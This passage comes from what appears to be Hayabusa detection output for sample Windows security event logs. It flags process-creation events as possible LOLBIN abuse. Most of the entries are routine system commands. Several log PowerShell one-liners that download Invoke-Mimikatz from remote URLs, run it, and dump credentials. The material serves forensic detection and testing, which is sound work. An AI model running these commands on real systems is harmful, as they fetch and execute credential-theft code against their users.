+09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0x6e8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 07:31:56.506 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\hqhlzlxj.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x710 
| User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 07:31:56.600 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\ffyanabt.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xf70 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 07:31:56.756 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\b_6b5oib.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x6dc | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 07:31:56.834 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\kyk3rvnx.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x980 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 07:31:57.381 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" ""Local CMOS Clock"" /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0xe5c | User: IEUser | LID: 
0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 07:31:57.397 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" time.windows.com /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0x7dc | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 07:37:26.756 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding | Path: C:\Windows\System32\rundll32.exe | PID: 0xdac | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-23 09:13:00.062 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x754 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-23 09:13:02.593 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x920 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-23 09:15:59.673 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xdfc | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-23 09:23:16.845 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\makecab.exe"" C:\Windows\Logs\CBS\CbsPersist_20160823002316.log C:\Windows\Logs\CBS\CbsPersist_20160823002316.cab | Path: C:\Windows\System32\makecab.exe | PID: 0xf7c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-23 09:28:51.548 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x3d0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-23 09:28:51.611 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xb50 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-23 09:28:51.626 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: 
C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xad4 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-23 09:30:51.548 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xc44 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:17:10.062 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x478 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:17:10.109 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x6f4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:20:07.546 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xe90 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:21:09.562 
+09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x708 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:21:09.578 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{6D9A7A40-DDCA-414E-B48E-DFB032C03C1B} | Path: C:\Windows\System32\dllhost.exe | PID: 0xec8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:25:05.171 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds -ComputerName @('computer1', 'computer2')"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd10 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:25:05.171 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:25:59.734 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4a8 | User: IEUser | 
LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:25:59.734 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:26:37.046 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9ec | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:26:37.046 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:27:31.828 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7a4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:27:31.828 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus 
Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:28:35.375 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xb3c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:29:40.093 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xf74 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:30:06.203 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x2a4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:30:06.203 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:38:23.076 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object 
Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa9c | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:38:23.076 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:51:10.232 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4fc | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:51:10.232 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:51:19.681 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe70 | User: IEUser | LID: 
0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:51:19.681 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:00:00.553 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x97c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:01:50.906 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd1c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:01:50.943 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x904 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:42:19.877 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc34 | User: IE10WIN7$ | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:42:28.120 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xbf4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:42:44.834 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd18 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:43:00.291 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3a8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:43:04.576 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\hp2phgfx.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xd50 | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:44:00.792 
+09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd08 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:44:00.843 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb70 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:44:02.654 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\lnyiquaj.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x818 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:45:43.530 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xce4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:45:43.908 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: 
C:\Windows\System32\dllhost.exe | PID: 0x3a0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:45:45.304 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\zqai1ke3.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xb8c | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:45:54.936 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe48 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:45:54.972 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf88 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:45:57.041 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\lygfnats.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x21c | User: IEUser | LID: 
0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:47:33.985 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xcd8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 07:47:34.016 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd48 | User: 